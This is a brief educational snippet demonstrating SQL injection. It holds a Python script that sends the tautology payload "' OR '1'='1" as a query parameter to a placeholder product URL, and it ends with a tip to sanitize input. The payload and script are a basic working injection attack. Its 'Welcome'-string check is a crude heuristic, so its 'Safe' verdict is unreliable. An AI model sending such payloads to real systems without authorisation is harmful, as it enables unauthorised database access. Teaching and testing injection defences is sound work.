The purpose of this project is to demonstrate how SQL injection works. The script below sends a crafted SQL payload to a vulnerable web application to test whether it is susceptible to injection.
Code Example:
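```python
import requests


def test_sql_injection(url):
    # Tautology payload: turns the WHERE clause into a condition that is always true
    payload = "' OR '1'='1"
    # requests URL-encodes the payload and appends it to the URL as ?id=...
    response = requests.get(url, params={'id': payload}, timeout=10)
    # Heuristic: treat a response containing "Welcome" as a sign the payload was accepted
    if "Welcome" in response.text:
        print("Vulnerable to SQL Injection")
    else:
        print("Safe")


# Base URL without a query string; the id parameter is supplied through params
url = "http://example.com/product"
test_sql_injection(url)
```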
Use Case: This script tests web applications for SQL injection vulnerabilities and shows how adversaries generally manipulate databases.
Tip: Always sanitize all user input to your web applications to protect against SQL injection attacks.